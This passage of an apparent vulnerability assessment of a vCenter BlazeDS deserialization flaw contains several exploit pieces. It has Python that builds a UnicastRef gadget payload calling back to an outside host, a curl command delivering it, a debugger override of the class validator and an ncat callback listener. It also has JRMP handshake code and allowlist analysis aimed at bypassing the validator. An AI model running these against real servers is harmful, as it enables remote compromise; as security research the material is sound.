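        return bytes([0x80 | (n >> 14), 0x80 | ((n >> 7) & 0x7F), n & 0x7F])
    return bytes([0x80 | (n >> 22), 0x80 | ((n >> 15) & 0x7F),
                  0x80 | ((n >> 8) & 0x7F), n & 0xFF])


def decode_u29(buf: bytes, pos: int):
    """Inverse of encode_u29; returns (value, new position)."""
    n = 0
    for i in range(4):
        b = buf[pos]
        pos += 1
        if i == 3:
            return (n << 8) | b, pos
        n = (n << 7) | (b & 0x7F)
        if not (b & 0x80):
            return n, pos


def build_unicastref_payload(host: str, port: int, obj_num: int) -> bytes:
    """AMF3 encoding of an externalizable sun.rmi.server.UnicastRef, laid out the way
    marshalsec's BlazeDSAMF3 UnicastRef gadget and UnicastRef.writeExternal produce it."""
    cls = UNICASTREF.encode()
    out = bytes([AMF3_OBJECT])
    out += encode_u29(0x07)                        # traits: inline obj | inline traits | externalizable
    out += encode_u29((len(cls) << 1) | 1) + cls   # class name as an inline AMF3 string
    # Externalized body = LiveRef.write(out, false): TCPEndpoint, ObjID, isResultStream
    out += struct.pack(">H", len(host)) + host.encode()  # host (DataOutput.writeUTF)
    out += struct.pack(">i", port)                       # port
    out += struct.pack(">q", obj_num)                    # ObjID.objNum
    out += struct.pack(">iqh", 0, 0, 0)                  # ObjID.space (UID): unique, time, count
    out += b"\x00"                                       # isResultStream = false
    return out


def payload_b64(host: str, port: int, obj_num: int) -> str:
    return base64.b64encode(build_unicastref_payload(host, port, obj_num)).decode()


def parse_selected_logs_spec(b64: str) -> dict:
    """Decode a SelectedLogsSpec value as far as Amf3Input.readObject gets before it must
    instantiate the named class, i.e. the point where ClassUtil.validateCreation runs."""
    buf = base64.b64decode(b64)
    marker = buf[0]
    if marker not in AMF3_MARKERS:
        raise ValueError(f"Unknown AMF type '{marker}'.")
    if marker != AMF3_OBJECT:
        return {"type": AMF3_MARKERS[marker]}
    traits, pos = decode_u29(buf, 1)
    if not (traits & 0x01) or not (traits & 0x02):
        raise ValueError("object/traits back-references cannot occur in a one-value payload")
    name_ref, pos = decode_u29(buf, pos)
    if not (name_ref & 0x01):
        raise ValueError("string-table reference where an inline class name was expected")
    name_len = name_ref >> 1
    class_name = buf[pos:pos + name_len].decode()
    pos += name_len
    info = {"type": "object", "class": class_name, "externalizable": bool(traits & 0x04)}
    if info["externalizable"] and class_name == UNICASTREF:
        # Only reached on a server whose validator lets the class through.
        (host_len,) = struct.unpack_from(">H", buf, pos)
        pos += 2
        info["host"] = buf[pos:pos + host_len].decode()
        pos += host_len
        info["port"], info["obj_num"] = struct.unpack_from(">iq", buf, pos)
    return info


def describe(b64: str) -> str:
    """The error BlazeDS reports for a value, or a one-line summary of what it decodes to."""
    try:
        info = parse_selected_logs_spec(b64)
    except ValueError as exc:
        return str(exc)
    return ", ".join(f"{k}={v}" for k, v in info.items())


if __name__ == "__main__":
    print(describe("QQ=="))
    print(describe(PAGE_PAYLOAD))
    print("rebuilt payload matches page:",
          payload_b64("172.16.57.1", 4444, 0x7C954D72) == PAGE_PAYLOAD)
```

Running it prints the `Unknown AMF type '65'.` text for `QQ==` and `class=sun.rmi.server.UnicastRef, host=172.16.57.1, port=4444, ...` for the page's payload, and confirms that the encoder reproduces marshalsec's bytes exactly. The host/port parse is only a preview of what the JVM would consume: on the real server the decoder never gets past the class name for this type.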
Testing RCE by forcing it in a debugger, lol
```
wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d "webClientSessionId=nope&SelectedLogsSpec=Cgczc3VuLnJtaS5zZXJ2ZXIuVW5pY2FzdFJlZgALMTcyLjE2LjU3LjEAABFcAAAAAHyVTXIAAAAAAAAAAAAAAAAAAAA="
*   Trying 172.16.57.237:443...
* Connected to 172.16.57.237 (172.16.57.237) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: CN=172.16.57.237; C=US
*  start date: Nov 30 23:59:14 2021 GMT
*  expire date: Dec  1 11:59:14 2023 GMT
*  issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> POST /vsphere-client/download/logs HTTP/1.1
> Host: 172.16.57.237
> User-Agent: curl/7.80.0
> Accept: */*
> Content-Length: 133
> Content-Type: application/x-www-form-urlencoded
>
```

```
Breakpoint hit: "thread=http-nio-9090-exec-10", flex.messaging.util.ClassUtil.validateCreation(), line=351 bci=76
351            if (!valid) {

http-nio-9090-exec-10[1] print valid
 valid = false
http-nio-9090-exec-10[1] set valid = true
 valid = true = true
http-nio-9090-exec-10[1] cont
>
```

```
wvu@kharak:~$ ncat -lkv 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.16.57.237.
Ncat: Connection from 172.16.57.237:41660.
JRMIK
```
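The `JRMIK` that ncat printed is the seven-byte JRMP stream header the JDK's `TCPChannel` sends when the forced-through `UnicastRef` is first used: the magic `JRMI` (0x4a 0x52 0x4d 0x49), protocol version 0x0002 (two unprintable bytes), and 0x4b for `StreamProtocol`. The Python below is an added example, not part of this assessment: it decodes that header per the RMI wire protocol specification and builds the `ProtocolAck` a listener must send back to keep the conversation open (the ack carries the client's host and port as the listener saw them). The captured bytes are reconstructed from the ncat output; the connecting address and port are the ones ncat logged.

```python
import struct

JRMP_MAGIC = b"JRMI"
JRMP_VERSION = 2
PROTOCOLS = {0x4B: "StreamProtocol", 0x4C: "SingleOpProtocol", 0x4D: "MultiplexProtocol"}
PROTOCOL_ACK = 0x4E
PROTOCOL_NACK = 0x4F

# Reconstructed from the "JRMIK" ncat printed: the 0x00 0x02 version bytes are invisible.
CAPTURED_HEADER = b"JRMI\x00\x02K"


def parse_jrmp_header(data: bytes) -> dict:
    """Validate a JRMP stream header and name the protocol the client asked for."""
    if len(data) < 7 or data[:4] != JRMP_MAGIC:
        raise ValueError("not a JRMP header")
    version, proto = struct.unpack_from(">HB", data, 4)
    if version != JRMP_VERSION:
        raise ValueError(f"unsupported JRMP version {version}")
    if proto not in PROTOCOLS:
        raise ValueError(f"unknown JRMP protocol byte {proto:#x}")
    return {"version": version, "protocol": PROTOCOLS[proto], "rest": data[7:]}


def protocol_ack(peer_host: str, peer_port: int) -> bytes:
    """Server side of the StreamProtocol handshake: ProtocolAck, then the client's
    endpoint as the server observed it (writeUTF host, writeInt port)."""
    host = peer_host.encode()
    return bytes([PROTOCOL_ACK]) + struct.pack(">H", len(host)) + host + struct.pack(">i", peer_port)


def handshake_reply(data: bytes, peer_host: str, peer_port: int) -> bytes:
    """What a listener on 4444 should answer to the bytes it just received."""
    try:
        header = parse_jrmp_header(data)
    except ValueError:
        return bytes([PROTOCOL_NACK])
    if header["protocol"] != "StreamProtocol":
        return bytes([PROTOCOL_NACK])   # SingleOp needs no ack; Multiplex is not supported here
    return protocol_ack(peer_host, peer_port)


if __name__ == "__main__":
    print(parse_jrmp_header(CAPTURED_HEADER))
    print(handshake_reply(CAPTURED_HEADER, "172.16.57.237", 41660).hex())
```

After the ack the client sends its own endpoint (UTF host, int port) and then JRMP messages proper (0x50 Call, 0x52 Ping, 0x54 DgcAck); the page stops at the header, so this example does too.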
Listing the allowed class patterns for future work
```
DataService.util.*
\[B
\[Ljava.lang.Object;
antrun.*
cis.ds.*
classes.*
classes.com.vmware.vim.binding.phonehome.*
classes.com.vmware.vim.sso.*
com.vmware.*
flex.messaging.io.ArrayCollection
flex.messaging.io.ArrayList
flex.messaging.io.amf.ASObject
flex.messaging.io.amf.SerializedObject
flex.messaging.messages.AcknowledgeMessage
flex.messaging.messages.AcknowledgeMessageExt
flex.messaging.messages.AsyncMessage
flex.messaging.messages.AsyncMessageExt
flex.messaging.messages.CommandMessage
flex.messaging.messages.CommandMessageExt
flex.messaging.messages.ErrorMessage
flex.messaging.messages.HTTPMessage
flex.messaging.messages.RemotingMessage
flex.messaging.messages.SOAPMessage
java.lang.Boolean
java.lang.Byte
java.lang.Character
java.lang.Double
java.lang.Float
java.lang.Integer
java.lang.Long
java.lang.Object
java.lang.Short
java.lang.String
java.util.ArrayList
java.util.Date
java.util.HashMap
lib.*
metadata.*
mozilla.*
org.apache.commons.net.*
org.apache.commons.net.bsd.*
org.apache.commons.net.chargen.*
org.apache.commons.net.daytime.*
org.apache.commons.net.discard.*
org.apache.commons.net.echo.*
org.apache.commons.net.finger.*
org.apache.commons.net.ftp.*
org.apache.commons.net.ftp.parser.*
org.apache.commons.net.imap.*
org.apache.commons.net.io.*
org.apache.commons.net.nntp.*
org.apache.commons.net.ntp.*
org.apache.commons.net.pop3.*
org.apache.commons.net.smtp.*
org.apache.commons.net.telnet.*
org.apache.commons.net.tftp.*
org.apache.commons.net.time.*
org.apache.commons.net.util.*
org.apache.commons.net.whois.*
org.json.*
org.w3c.dom.Document
schema.*
```
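The backslash-escaped `\[B` and `\[Ljava.lang.Object;` entries show that this allowlist is a set of Java regular expressions, which is the form BlazeDS's `ClassDeserializationValidator` takes its allow patterns in. The Python below is an added model of that check, not VMware's or BlazeDS's code; it assumes each entry must match the whole class name as a regex (the real matching rule is not on the page) and uses the listing above to answer the question the traces leave open: which class names `validateCreation` would have let through. The candidate class names are constructed for the example; the `com.vmware.*` result is what the follow-up comment about nesting a gadget inside a valid `SelectedLogsSpec` type is getting at.

```python
import re

# Allow patterns copied from the vCenter listing above, treated as Java-style
# regular expressions that must match the whole class name (an assumption).
ALLOWED_PATTERNS = r"""
DataService.util.* \[B \[Ljava.lang.Object; antrun.* cis.ds.* classes.*
classes.com.vmware.vim.binding.phonehome.* classes.com.vmware.vim.sso.* com.vmware.*
flex.messaging.io.ArrayCollection flex.messaging.io.ArrayList
flex.messaging.io.amf.ASObject flex.messaging.io.amf.SerializedObject
flex.messaging.messages.AcknowledgeMessage flex.messaging.messages.AcknowledgeMessageExt
flex.messaging.messages.AsyncMessage flex.messaging.messages.AsyncMessageExt
flex.messaging.messages.CommandMessage flex.messaging.messages.CommandMessageExt
flex.messaging.messages.ErrorMessage flex.messaging.messages.HTTPMessage
flex.messaging.messages.RemotingMessage flex.messaging.messages.SOAPMessage
java.lang.Boolean java.lang.Byte java.lang.Character java.lang.Double java.lang.Float
java.lang.Integer java.lang.Long java.lang.Object java.lang.Short java.lang.String
java.util.ArrayList java.util.Date java.util.HashMap lib.* metadata.* mozilla.*
org.apache.commons.net.* org.apache.commons.net.bsd.* org.apache.commons.net.chargen.*
org.apache.commons.net.daytime.* org.apache.commons.net.discard.* org.apache.commons.net.echo.*
org.apache.commons.net.finger.* org.apache.commons.net.ftp.* org.apache.commons.net.ftp.parser.*
org.apache.commons.net.imap.* org.apache.commons.net.io.* org.apache.commons.net.nntp.*
org.apache.commons.net.ntp.* org.apache.commons.net.pop3.* org.apache.commons.net.smtp.*
org.apache.commons.net.telnet.* org.apache.commons.net.tftp.* org.apache.commons.net.time.*
org.apache.commons.net.util.* org.apache.commons.net.whois.* org.json.* org.w3c.dom.Document schema.*
""".split()

_COMPILED = [re.compile(p) for p in ALLOWED_PATTERNS]


def is_allowed(class_name: str) -> bool:
    """True if any allow pattern matches the whole class name."""
    return any(p.fullmatch(class_name) for p in _COMPILED)


def validate_creation(class_name: str) -> tuple:
    """(allowed, message); the message mirrors the warning and exception text on the page."""
    if is_allowed(class_name):
        return True, f"Deserialization allowed for type {class_name}"
    return False, (f"Deserialization skipped for type {class_name}: "
                   f"Creation validation for class '{class_name}' failed.")


def open_namespaces() -> list:
    """Wildcard entries: every class under these prefixes can be instantiated by the AMF decoder."""
    return sorted(p[:-2] for p in ALLOWED_PATTERNS if p.endswith(".*"))


# Constructed candidates: the gadget the page tried, a BlazeDS default type, the
# array forms, a VMware class from the page's own log lines, and a classic
# Commons Collections gadget class that is not listed.
CANDIDATES = [
    "sun.rmi.server.UnicastRef",
    "java.util.HashMap",
    "[B",
    "[Ljava.lang.String;",
    "com.vmware.vise.messaging.validators.ClassDeserializationValidator",
    "org.apache.commons.collections.functors.InvokerTransformer",
]


def triage(candidates=CANDIDATES) -> dict:
    """Map each candidate class name to the validator's decision."""
    return {c: is_allowed(c) for c in candidates}


if __name__ == "__main__":
    for cls, ok in triage().items():
        print("ALLOW" if ok else "DENY ", cls)
    print(len(open_namespaces()), "wildcard namespaces, e.g.", open_namespaces()[:3])
```

Two things fall out of running it: the gadget class and anything outside the listed namespaces is refused exactly as the second trace shows, while 32 of the 62 entries are wildcards, so any class under `com.vmware`, `org.apache.commons.net`, `org.json` and the oddly named `lib`, `classes`, `schema` and `metadata` prefixes is fair game for the decoder. Whether any of those classes has a useful constructor, setter or `readExternal` is the open question the notes end on.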
General Information
Vendors
- vmware
Products
- cloud foundation 3.0,
- vcenter server 6.5,
- vcenter server 6.7
Can’t find the def’n of the SelectedLogsSpec object, but maybe you could nest a Unicast object within an instance of a valid SelectedLogsSpec object? Should pass verification (in theory).
I haven’t forgotten about this. I’ll circle back to it later. Thanks!
https://twitter.com/wvuuuuuuuuuuuuu/status/1468418915994898434